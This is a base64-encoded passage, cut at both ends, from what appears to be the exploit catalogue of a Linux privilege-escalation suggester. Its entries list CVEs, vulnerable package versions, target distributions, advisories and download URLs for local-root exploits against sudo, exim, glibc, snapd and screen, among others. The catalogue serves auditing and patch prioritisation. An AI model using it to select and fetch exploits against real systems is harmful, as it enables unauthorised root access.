KVGFnczogZGViaWFuPTgsdWJ1bnR1PTE0LjA0fDE2LjA0fDE2LjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9OZ2lueC1FeHBsb2l0LURlYi1Sb290LVByaXZFc2MtQ1ZFLTIwMTYtMTI0Ny5odG1sCnNyYy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi0xMjQ3L25naW54ZWQtcm9vdC5zaApleHBsb2l0LWRiOiA0MDc2OAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBSb290aW5nIGRlcGVuZHMgb24gY3Jvbi5kYWlseSAodXAgdG8gMjRoIG9mIGRlbGF5KS4gQWZmZWN0ZWQ6IGRlYjg6IDwxLjYuMjsgMTQuMDQ6IDwxLjQuNjsgMTYuMDQ6IDEuMTAuMDsgZ2VudG9vOiA8MS4xMC4yLXIzCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTE1MzFdJHt0eHRyc3R9IHBlcmxfc3RhcnR1cCAoZXhpbSkKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTU0OQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0xNTMxXSR7dHh0cnN0fSBwZXJsX3N0YXJ0dXAgKGV4aW0pIDIKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTUzNQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi00OTg5XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdCAyClJlcXM6IHBrZz1zZXRyb3VibGVzaG9vdApUYWdzOiBSSEVMPTZ8NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jLXNraWxscy5ibG9nc3BvdC5jb20vMjAxNi8wNi9sZXRzLWZlZWQtYXR0YWNrZXItaW5wdXQtdG8tc2gtYy10by1zZWUuaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vc3RlYWx0aC90cm91Ymxlc2hvb3Rlci9yYXcvbWFzdGVyL3N0cmFpZ2h0LXNob290ZXIuYwpleHBsb2l0LWRiOgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01NDI1XSR7dHh0cnN0fSB0b21jYXQtUkgtcm9vdC5zaApSZXFzOiBwa2c9dG9tY2F0ClRhZ3M6IFJIRUw9NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9Ub21jYXQtUmVkSGF0LVBrZ3MtUm9vdC1Qcml2RXNjLUV4cGxvaXQtQ1ZFLTIwMTYtNTQyNS5odG1sCnNyYy11cmw6IGh0dHA6Ly9sZWdhbGhhY2tlcnMuY29tL2V4cGxvaXRzL3RvbWNhdC1SSC1yb290LnNoCmV4cGxvaXQtZGI6IDQwNDg4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFmZmVjdHMgb25seSBSZWRIYXQtYmFzZWQgZGlzdHJvcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi02NjYzLENWRS0yMDE2LTY2NjR8Q1ZFLTIwMTYtNjY2Ml0ke3R4dHJzdH0gbXlzcWwtZXhwbG9pdC1jaGFpbgpSZXFzOiBwa2c9bXlzcWwtc2VydmVyfG1hcmlhZGItc2VydmVyLHZlcjw1LjUuNTIKVGFnczogdWJ1bnR1PTE2LjA0LjEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL015U1FMLU1hcmlhLVBlcmNvbmEtUHJpdkVzY1JhY2UtQ1ZFLTIwMTYtNjY2My01NjE2LUV4cGxvaXQuaHRtbApzcmMtdXJsOiBodHRwOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi02NjYzL215c3FsLXByaXZlc2MtcmFjZS5jCmV4cGxvaXQtZGI6IDQwNjc4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsc28gTWFyaWFEQiB2ZXI8MTAuMS4xOCBhbmQgdmVyPDEwLjAuMjggYWZmZWN0ZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtOTU2Nl0ke3R4dHJzdH0gbmFnaW9zLXJvb3QtcHJpdmVzYwpSZXFzOiBwa2c9bmFnaW9zLHZlcjw0LjIuNApUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9sZWdhbGhhY2tlcnMuY29tL2Fkdmlzb3JpZXMvTmFnaW9zLUV4cGxvaXQtUm9vdC1Qcml2RXNjLUNWRS0yMDE2LTk1NjYuaHRtbApzcmMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvQ1ZFLTIwMTYtOTU2Ni9uYWdpb3Mtcm9vdC1wcml2ZXNjLnNoCmV4cGxvaXQtZGI6IDQwOTIxCmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsbG93cyBwcml2IGVzY2FsYXRpb24gZnJvbSBuYWdpb3MgdXNlciBvciBuYWdpb3MgZ3JvdXAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMDM1OF0ke3R4dHJzdH0gbnRmcy0zZy1tb2Rwcm9iZQpSZXFzOiBwa2c9bnRmcy0zZyx2ZXI8MjAxNy40ClRhZ3M6IHVidW50dT0xNi4wNHtudGZzLTNnOjIwMTUuMy4xNEFSLjEtMWJ1aWxkMX0sZGViaWFuPTcuMHtudGZzLTNnOjIwMTIuMS4xNUFSLjUtMi4xK2RlYjd1Mn0sZGViaWFuPTguMHtudGZzLTNnOjIwMTQuMi4xNUFSLjItMStkZWI4dTJ9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2J1Z3MuY2hyb21pdW0ub3JnL3AvcHJvamVjdC16ZXJvL2lzc3Vlcy9kZXRhaWw/aWQ9MTA3MgpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80MTM1Ni56aXAKZXhwbG9pdC1kYjogNDEzNTYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuIExpbnV4IGhlYWRlcnMgbXVzdCBiZSBpbnN0YWxsZWQuIFN5c3RlbSBtdXN0IGhhdmUgYXQgbGVhc3QgdHdvIENQVSBjb3Jlcy4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTg5OV0ke3R4dHJzdH0gcy1uYWlsLXByaXZnZXQKUmVxczogcGtnPXMtbmFpbCx2ZXI8MTQuOC4xNgpUYWdzOiB1YnVudHU9MTYuMDQsbWFuamFybz0xNi4xMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcKc3JjLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcvMQpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy01ODk5L2V4cGxvaXQuc2gKYXV0aG9yOiB3YXBpZmxhcGkgKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBCcmVuZGFuIENvbGVzIChhdXRob3Igb2YgZXhwbG9pdCB1cGRhdGUgYXQgJ2V4dC11cmwnKQpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2N10ke3R4dHJzdH0gU3Vkb2VyLXRvLXJvb3QKUmVxczogcGtnPXN1ZG8sdmVyPD0xLjguMjAsY21kOlsgLWYgL3Vzci9zYmluL2dldGVuZm9yY2UgXQpUYWdzOiBSSEVMPTd7c3VkbzoxLjguNnA3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc3Vkby53cy9hbGVydHMvbGludXhfdHR5Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA1LzMwL2N2ZS0yMDE3LTEwMDAzNjcvbGludXhfc3Vkb19jdmUtMjAxNy0xMDAwMzY3LmMKZXhwbG9pdC1kYjogNDIxODMKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IE5lZWRzIHRvIGJlIHN1ZG9lci4gV29ya3Mgb25seSBvbiBTRUxpbnV4IGVuYWJsZWQgc3lzdGVtcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzY3XSR7dHh0cnN0fSBzdWRvcHduClJlcXM6IHBrZz1zdWRvLHZlcjw9MS44LjIwLGNtZDpbIC1mIC91c3Ivc2Jpbi9nZXRlbmZvcmNlIF0KVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnN1ZG8ud3MvYWxlcnRzL2xpbnV4X3R0eS5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jMGQzejNyMC9zdWRvLUNWRS0yMDE3LTEwMDAzNjcvbWFzdGVyL3N1ZG9wd24uYwpleHBsb2l0LWRiOgphdXRob3I6IGMwZDN6M3IwCkNvbW1lbnRzOiBOZWVkcyB0byBiZSBzdWRvZXIuIFdvcmtzIG9ubHkgb24gU0VMaW51eCBlbmFibGVkIHN5c3RlbXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcwXSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDYvMTkvc3RhY2stY2xhc2gvc3RhY2stY2xhc2gudHh0CnNyYy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9saW51eF9sZHNvX2h3Y2FwLmMKZXhwbG9pdC1kYjogNDIyNzQKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IFVzZXMgIlN0YWNrIENsYXNoIiB0ZWNobmlxdWUsIHdvcmtzIGFnYWluc3QgbW9zdCBTVUlELXJvb3QgYmluYXJpZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcxXSR7dHh0cnN0fSBsaW51eF9sZHNvX2R5bmFtaWMKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczogZGViaWFuPTl8MTAsdWJ1bnR1PTE0LjA0LjV8MTYuMDQuMnwxNy4wNCxmZWRvcmE9MjN8MjR8MjUKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29fZHluYW1pYy5jCmV4cGxvaXQtZGI6IDQyMjc2CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOiBVc2VzICJTdGFjayBDbGFzaCIgdGVjaG5pcXVlLCB3b3JrcyBhZ2FpbnN0IG1vc3QgU1VJRC1yb290IFBJRXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzc5XSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwXzY0ClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2XzY0ClRhZ3M6IGRlYmlhbj03Ljd8OC41fDkuMCx1YnVudHU9MTQuMDQuMnwxNi4wNC4yfDE3LjA0LGZlZG9yYT0yMnwyNSxjZW50b3M9Ny4zLjE2MTEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29faHdjYXBfNjQuYwpleHBsb2l0LWRiOiA0MjI3NQphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZSwgd29ya3MgYWdhaW5zdCBtb3N0IFNVSUQtcm9vdCBiaW5hcmllcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzcwLENWRS0yMDE3LTEwMDAzNzFdJHt0eHRyc3R9IGxpbnV4X29mZnNldDJsaWIKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X29mZnNldDJsaWIuYwpleHBsb2l0LWRiOiA0MjI3MwphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDAwMDAxXSR7dHh0cnN0fSBSYXRpb25hbExvdmUKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjwyLjI3LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLHg4Nl82NApUYWdzOiBkZWJpYW49OXtsaWJjNjoyLjI0LTExK2RlYjl1MX0sdWJ1bnR1PTE2LjA0LjN7bGliYzY6Mi4yMy0wdWJ1bnR1OX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTcvTGliY1JlYWxwYXRoQnVmZmVyVW5kZXJmbG93LwpzcmMtdXJsOiBodHRwczovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE3L0xpYmNSZWFscGF0aEJ1ZmZlclVuZGVyZmxvdy9SYXRpb25hbExvdmUuYwpDb21tZW50czoga2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9MSByZXF1aXJlZApiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE4LTEwMDAwMDEvUmF0aW9uYWxMb3ZlCmV4cGxvaXQtZGI6IDQzNzc1CmF1dGhvcjogaGFsZmRvZwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDkwMF0ke3R4dHJzdH0gdnBuY19wcml2ZXNjLnB5ClJlcXM6IHBrZz1uZXR3b3JrbWFuYWdlci12cG5jfG5ldHdvcmstbWFuYWdlci12cG5jLHZlcjwxLjIuNgpUYWdzOiB1YnVudHU9MTYuMDR7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4xLjkzLTF9LGRlYmlhbj05LjB7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4yLjQtNH0sbWFuamFybz0xNwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9wdWxzZXNlY3VyaXR5LmNvLm56L2Fkdmlzb3JpZXMvTk0tVlBOQy1Qcml2ZXNjCnNyYy11cmw6IGh0dHBzOi8vYnVnemlsbGEubm92ZWxsLmNvbS9hdHRhY2htZW50LmNnaT9pZD03NzkxMTAKZXhwbG9pdC1kYjogNDUzMTMKYXV0aG9yOiBEZW5pcyBBbmR6YWtvdmljCkNvbW1lbnRzOiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xNDY2NV0ke3R4dHJzdH0gcmFwdG9yX3hvcmd5ClJlcXM6IHBrZz14b3JnLXgxMS1zZXJ2ZXItWG9yZyxjbWQ6WyAtdSAvdXNyL2Jpbi9Yb3JnIF0KVGFnczogY2VudG9zPTcuNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc2VjdXJlcGF0dGVybnMuY29tLzIwMTgvMTAvY3ZlLTIwMTgtMTQ2NjUteG9yZy14LXNlcnZlci5odG1sCmV4cGxvaXQtZGI6IDQ1OTIyCmF1dGhvcjogcmFwdG9yCkNvbW1lbnRzOiBYLk9yZyBTZXJ2ZXIgYmVmb3JlIDEuMjAuMyBpcyB2dWxuZXJhYmxlLiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS03MzA0XSR7dHh0cnN0fSBkaXJ0eV9zb2NrClJlcXM6IHBrZz1zbmFwZCx2ZXI8Mi4zNyxjbWQ6WyAtUyAvcnVuL3NuYXBkLnNvY2tldCBdClRhZ3M6IHVidW50dT0xOC4xMCxtaW50PTE5ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2luaXRibG9nLmNvbS8yMDE5L2RpcnR5LXNvY2svCmV4cGxvaXQtZGI6IDQ2MzYxCmV4cGxvaXQtZGI6IDQ2MzYyCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2svYXJjaGl2ZS9tYXN0ZXIuemlwCmF1dGhvcjogSW5pdFN0cmluZwpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTAxNDldJHt0eHRyc3R9IHJhcHRvcl9leGltX3dpegpSZXFzOiBwa2c9ZXhpbXxleGltNCx2ZXI+PTQuODcsdmVyPD00LjkxClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTkvMDYvMDUvY3ZlLTIwMTktMTAxNDkvcmV0dXJuLXdpemFyZC1yY2UtZXhpbS50eHQKZXhwbG9pdC1kYjogNDY5OTYKYXV0aG9yOiByYXB0b3IKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTIxODFdJHt0eHRyc3R9IFNlcnYtVSBGVFAgU2VydmVyClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvU2Vydi1VL1NlcnYtVSBdClRhZ3M6IGRlYmlhbj05ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cudmFzdGFydC5kZXYvMjAxOS8wNi9jdmUtMjAxOS0xMjE4MS1zZXJ2LXUtZXhwbG9pdC13cml0ZXVwLmh0bWwKZXhwbG9pdC1kYjogNDcwMDkKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2d1eXdoYXRhZ3V5L0NWRS0yMDE5LTEyMTgxL21hc3Rlci9zZXJ2dS1wZS1jdmUtMjAxOS0xMjE4MS5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMvbG9jYWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEyMTgxL1NVcm9vdAphdXRob3I6IEd1eSBMZXZpbiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkNvbW1lbnRzOiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyB1c2VzIGJhc2ggZXhlYyB0ZWNobmlxdWUsIHJhdGhlciB0aGFuIGNvbXBpbGluZyB3aXRoIGdjYy4KRU9GCikKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xODg2Ml0ke3R4dHJzdH0gR05VIE1haWx1dGlscyAyLjAgPD0gMy43IG1haWRhZyB1cmwgbG9jYWwgcm9vdCAoQ1ZFLTIwMTktMTg4NjIpClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvc2Jpbi9tYWlkYWcgXQpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm1pa2UtZ3VhbHRpZXJpLmNvbS9wb3N0cy9maW5kaW5nLWEtZGVjYWRlLW9sZC1mbGF3LWluLWdudS1tYWlsdXRpbHMKZXh0LXVybDogaHR0cHM6Ly9naXRodWIuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9yYXcvbWFzdGVyL0NWRS0yMDE5LTE4ODYyL2V4cGxvaXQuY3Jvbi5zaApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL3Jhdy9tYXN0ZXIvQ1ZFLTIwMTktMTg4NjIvZXhwbG9pdC5sZHByZWxvYWQuc2gKYXV0aG9yOiBiY29sZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTg2MzRdJHt0eHRyc3R9IHN1ZG8gcHdmZWVkYmFjawpSZXFzOiBwa2c9c3Vkbyx2ZXI8MS44LjMxClRhZ3M6IG1pbnQ9MTkKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZHlsYW5rYXR6LmNvbS9BbmFseXNpcy1vZi1DVkUtMjAxOS0xODYzNC8Kc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL3NhbGVlbXJhc2hpZC9zdWRvLWN2ZS0yMDE5LTE4NjM0L3Jhdy9tYXN0ZXIvZXhwbG9pdC5jCmF1dGhvcjogc2FsZWVtcmFzaGlkCkNvbW1lbnRzOiBzdWRvIGNvbmZpZ3VyYXRpb24gcmVxdWlyZXMgcHdmZWVkYmFjayB0byBiZSBlbmFibGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMC05NDcwXSR7dHh0cnN0fSBXaW5nIEZUUCBTZXJ2ZXIgPD0gNi4yLjUgTFBFClJlcXM6IGNtZDpbIC14IC9ldGMvaW5pdC5kL3dmdHBzZXJ2ZXIgXQpUYWdzOiB1YnVudHU9MTgKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAucGhwCnNyYy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAuc2gKZXhwbG9pdC1kYjogNDgxNTQKYXV0aG9yOiBDYXJ5IENvb3BlcgpDb21tZW50czogUmVxdWlyZXMgYW4gYWRtaW5pc3RyYXRvciB0byBsb2dpbiB2aWEgdGhlIHdlYiBpbnRlcmZhY2UuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdApSZXFzOiBwa2c9c3Vkbyx2ZXI8MS45LjVwMgpUYWdzOiBtaW50PTE5LHVidW50dT0xOHwyMCwgZGViaWFuPTEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL2JsYXN0eS9DVkUtMjAyMS0zMTU2L3ppcC9tYWluCmF1dGhvcjogYmxhc3R5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdCAyClJlcXM6IHBrZz1zdWRvLHZlcjwxLjkuNXAyClRhZ3M6IGNlbnRvcz02fDd8OCx1YnVudHU9MTR8MTZ8MTd8MTh8MTl8MjAsIGRlYmlhbj05fDEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL3dvcmF3aXQvQ1ZFLTIwMjEtMzE1Ni96aXAvbWFpbgphdXRob3I6IHdvcmF3aXQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTYxOF0ke3R4dHJzdH0gc2V0dWlkIHNjcmVlbiB2NC41LjAgTFBFClJlcXM6IHBrZz1zY3JlZW4sdmVyPT00LjUuMApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vc2VjbGlzdHMub3JnL29zcy1z